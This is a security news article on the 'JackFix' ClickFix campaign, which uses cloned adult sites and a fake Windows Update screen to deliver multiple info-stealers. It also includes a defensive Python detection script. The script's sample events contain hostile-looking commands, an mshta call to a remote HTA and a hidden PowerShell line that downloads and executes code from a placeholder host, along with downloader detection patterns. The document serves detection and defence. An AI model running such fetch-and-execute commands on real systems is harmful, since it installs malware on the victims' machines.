New “JackFix” Attack Leverages Windows Updates into Executing Malicious Commands

Researchers have documented a sophisticated ClickFix campaign, dubbed "JackFix", that uses fake adult websites to take over the victim's screen with a realistic Windows Update prompt and trick the user into running commands that fetch a multistage malware payload.

Attackers lure victims with clones of popular adult sites such as xHamster, most likely promoted through malvertising on low-reputation ad networks. Interacting with the phishing page triggers a full-screen overlay styled as a critical Windows security update, complete with animations, progress bars and blue-screen styling.

[Image: the fake Windows Update screen]

This “screen hijacking” combines urgency from the update theme with embarrassment from adult content, pressuring hasty compliance.

The lure sites themselves are clones of popular platforms such as xHamster and PornHub, which the researchers believe are promoted through malvertising. As soon as the user interacts with one of them, the "JackFix" routine fires: the browser is forced into full-screen mode and shows a convincing "Critical Windows Security Updates" screen, complete with animations and progress counters.

This screen-locking technique, reminiscent of older screen-locker malware, pressures the victim into following on-screen instructions to resolve a fabricated security issue.

The fake interface tries to intercept the usual escape keys, Escape and F11, although the researchers found the blocking was not fully effective in the browsers they tested; a page cannot reliably suppress the Escape exit from the browser's Fullscreen API, so the "lock" is cosmetic rather than enforced. The technique works because it exploits the victim's urgency and their familiarity with the Windows Update look to get them to run commands on their own machine.

The threat actors have implemented several advanced methods to evade detection. The campaign not only obfuscates its malware payloads but also the very commands used to initiate the ClickFix attack, allowing it to bypass many current prevention tools.

The malicious URLs also use a selective-serving trick. Fetched directly in a browser or by a scanner, they redirect to benign sites such as Google or Steam; the payload is served only when the request comes from the specific PowerShell command the victim was told to run. Anyone analysing such a URL therefore needs to reproduce that request (the same client and request characteristics as the pasted command) rather than opening it in a browser, or the infrastructure will appear clean.

This keeps the attacker's infrastructure from being flagged by security analysis services such as VirusTotal, whose scanners only ever see the benign redirect.

Once the victim runs the initial command, a multistage chain starts. The pasted command launches mshta, which in turn starts a PowerShell downloader.

This second-stage script repeatedly requests elevation, bombarding the user with User Account Control (UAC) prompts and effectively rendering the machine unusable until administrative privileges are granted. Once elevated, the script deploys a large number of malware samples at once.
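One way to catch this chain in endpoint telemetry, as an added example that is not code from the original report or the researchers: the script below runs three checks over constructed Sysmon-style process-creation records (Event ID 1 fields UtcTime, Image, ParentImage, CommandLine) for an mshta launch with a remote URL, a PowerShell downloader whose parent is mshta, and a burst of consent.exe (the UAC dialog) launches that matches the forced-elevation loop. The sample events, the placeholder domain and the burst thresholds are all assumptions made for the demonstration.

```python
"""Flag the JackFix execution chain in process-creation telemetry.

Added example, not code from the original report or the researchers.
Input is assumed to be Sysmon Event ID 1 (process creation) records flattened
into dicts with the Sysmon field names UtcTime, Image, ParentImage and
CommandLine; the records below are constructed for the demonstration.
"""
import re
from datetime import datetime, timedelta

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# Cmdlets and .NET calls a PowerShell downloader stage typically relies on.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|net\.webclient",
    re.I,
)
# consent.exe is the UAC consent dialog; a legitimate user rarely sees
# several of them within a minute. Thresholds are assumptions to tune locally.
UAC_BURST_COUNT = 5
UAC_BURST_WINDOW = timedelta(seconds=60)


def _image(path):
    """Lower-cased file name of a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def detect(events):
    """Return (rule_name, event) pairs, one per stage of the chain seen."""
    alerts = []
    consent = []
    for e in events:
        img = _image(e["Image"])
        parent = _image(e.get("ParentImage", ""))
        cmd = e.get("CommandLine", "")
        # Stage 1: the command pasted into the Run dialog launches mshta
        # against a remote URL rather than a local .hta file.
        if img == "mshta.exe" and URL_RE.search(cmd):
            alerts.append(("mshta_remote_hta", e))
        # Stage 2: mshta hands off to a PowerShell downloader.
        elif img == "powershell.exe" and parent == "mshta.exe" and DOWNLOAD_RE.search(cmd):
            alerts.append(("powershell_downloader_from_mshta", e))
        # Stage 3: the elevation loop shows up as repeated UAC dialogs.
        elif img == "consent.exe":
            consent.append(e)

    consent.sort(key=lambda e: _ts(e["UtcTime"]))
    for i in range(len(consent) - UAC_BURST_COUNT + 1):
        first, last = consent[i], consent[i + UAC_BURST_COUNT - 1]
        if _ts(last["UtcTime"]) - _ts(first["UtcTime"]) <= UAC_BURST_WINDOW:
            alerts.append(("uac_prompt_burst", first))
            break
    return alerts


def _event(time, image, parent, cmd):
    return {"UtcTime": time, "Image": image, "ParentImage": parent, "CommandLine": cmd}


SYS32 = r"C:\Windows\System32"
# Constructed sample: a benign local HTA and a benign PowerShell session,
# then the malicious chain. The domain is a placeholder, not a real IOC.
SAMPLE_EVENTS = [
    _event("2025-01-10 12:00:00", SYS32 + r"\mshta.exe", r"C:\Windows\explorer.exe",
           r"mshta C:\Tools\inventory.hta"),
    _event("2025-01-10 12:00:02", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Windows\explorer.exe", "powershell Get-Process"),
    _event("2025-01-10 12:00:05", SYS32 + r"\mshta.exe", r"C:\Windows\explorer.exe",
           "mshta https://update-check.example/verify.hta"),
    _event("2025-01-10 12:00:07", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
           SYS32 + r"\mshta.exe",
           'powershell -w hidden -ep bypass -c "iwr https://update-check.example/s2 | iex"'),
] + [
    _event(f"2025-01-10 12:00:{10 + 3 * i:02d}", SYS32 + r"\consent.exe",
           SYS32 + r"\svchost.exe", f"consent.exe 1234 {i} 000001")
    for i in range(6)
]


def rule_names(events):
    """Convenience wrapper: just the rule names, in detection order."""
    return [name for name, _ in detect(events)]


if __name__ == "__main__":
    for name, e in detect(SAMPLE_EVENTS):
        print(f"{e['UtcTime']}  {name:32}  {e['CommandLine']}")
```

The first two rules are cheap per-event matches and can be ported directly to a SIEM query; the third needs a time window, which is why it is computed after the pass over the events. Tune the burst threshold against your own baseline, since software installers that legitimately re-prompt for elevation will also produce several consent.exe launches.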

In what the researchers describe as a "spray and pray" strategy, a single infection can execute eight different malware variants. The deployed malware includes current versions of potent info-stealers such as Rhadamanthys, Vidar 2.0 and RedLine, the Amadey botnet client, and various loaders and Remote Access Trojans (RATs).

This massive deployment ensures that even if some payloads are blocked, others are likely to succeed, posing a severe risk of data theft, including passwords and cryptocurrency wallets.

The researchers noted that this unique combination of psychological manipulation, advanced obfuscation, and multi-payload delivery makes the “JackFix” campaign a significant and evolving threat.